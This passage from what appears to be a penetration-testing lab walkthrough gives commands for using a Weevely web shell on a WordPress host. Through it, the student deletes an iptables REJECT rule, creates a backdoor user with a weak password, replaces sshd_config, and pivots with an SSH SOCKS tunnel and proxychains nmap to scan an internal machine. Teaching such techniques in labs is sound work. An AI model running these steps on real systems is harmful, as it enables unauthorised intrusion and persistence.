Now, you will need to open a terminal and enter the following command:

sudo proxychains weevely http://192.168.10.112/wordpress/wp-content/uploads/wee.php

pass

After you enter this command, you will see the following screen:
Source: Weevely in terminal

At this point, you will need to enter a Linux-based command to interact with the system. In the
terminal, enter the following command:

uname

Source: Weevely in terminal

However, you still have an issue due to routing restrictions. Now you will remove the routing
restrictions so you can SSH directly to the host. Type the following command to list the iptables:

sudo iptables -L --line-numbers

This will list the iptables for the host.

Source: Weevely in terminal

Part 15
You will now delete the REJECT restriction for the Kali host. Enter the following command.

sudo iptables -D INPUT 3

Source: Weevely in terminal

You will again add a user to the system. Enter the following command.

sudo adduser bob

sudo echo ‘bob:bob’ | sudo chpasswd

Source: Weevely in terminal

Part 16
Now, remove the proxy setup from the browser by reversing the steps you did earlier in ​Part 12​.

file_upload /home/StudentFirst/Desktop/sshd_config /tmp/sshd_config

Source: Weevely in terminal

Then you need to move the file to the correct location. Enter the following command in the
terminal.

sudo cp /tmp/sshd_config /etc/ssh/sshd_config

Source: Weevely in terminal
Now, you need to start and stop the sshd service. Enter the following command:

sudo service sshd restart

Source: Weevely in terminal

Now you can SSH back to the host. Type the following command:

sudo ssh -D 3434 bob@192.168.10.112

Part 17

Now that you have compromised the network, use the following command to show that you are
talking with an internal workstation:

sudo proxychains nmap -sT -PN -n -sV -p 80,443,21,22,3389 192.168.10.201

--------------
Note:​ Y
​ ou will see some new output when running this command. That output will look like the
top part of the screen below. This is showing how ProxyChains is building the connections. This
command will take time to run.
--------------
Source: Nmap in terminal

Take a screenshot and add it to your report.

Now that you have access to the two systems in the network, see if you can get root on either
host.

Congratulations! You have now reached the end of the lab!